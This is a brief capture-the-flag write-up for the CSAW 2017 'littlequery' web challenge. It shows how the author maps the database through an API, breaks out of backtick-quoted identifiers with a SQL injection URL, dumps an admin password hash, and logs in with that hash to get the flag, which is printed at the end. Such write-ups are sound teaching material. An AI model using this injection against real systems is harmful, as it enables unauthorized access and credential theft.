CSAW CTF Qualification Round 2017 -- littlequery -- Web200 Writeup
problem description
LittleQuery
I've got a new website for BIG DATA analytics!
http://littlequery.chal.csaw.io<
on first page source code there is html comment for some api
/api/db_explore.php">API</a></p> kquote>
check it
Must specify mode={schema|preview}
lets try schema
http://littlequery.chal.csaw.io/api/db_explore.php?mode=schema
{"dbs":["littlequery"]}
this feature enable us to see db structure
http://littlequery.chal.csaw.io/api/db_explore.php?mode=schema&db=littlequery&table=user
{"columns":{"uid":"int(11)","username":"varchar(128)","password":"varchar(40)"}}if we try to see content using preview we are blocked
http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=littlequery&table=user
Database 'littlequery' is not allowed to be previewed.but this looks like dummy filter
http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=littlequeryTEST&table=user
`littlequeryTEST`.`user` doesn't exist.so db query somehow like this
select * from `$db`.`$table`
since littlequery in db var is blocked we can do sqlinj
http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=littlequery`.`user`--%20-&table=
[{"uid":"1","username":"admin","password":"5896e92d38ee883cc09ad6f88df4934f6b074cf8"}]and there u got hash
use it to login passed hash directory in post and get flag
flag{mayb3_1ts_t1m3_4_real_real_escape_string?}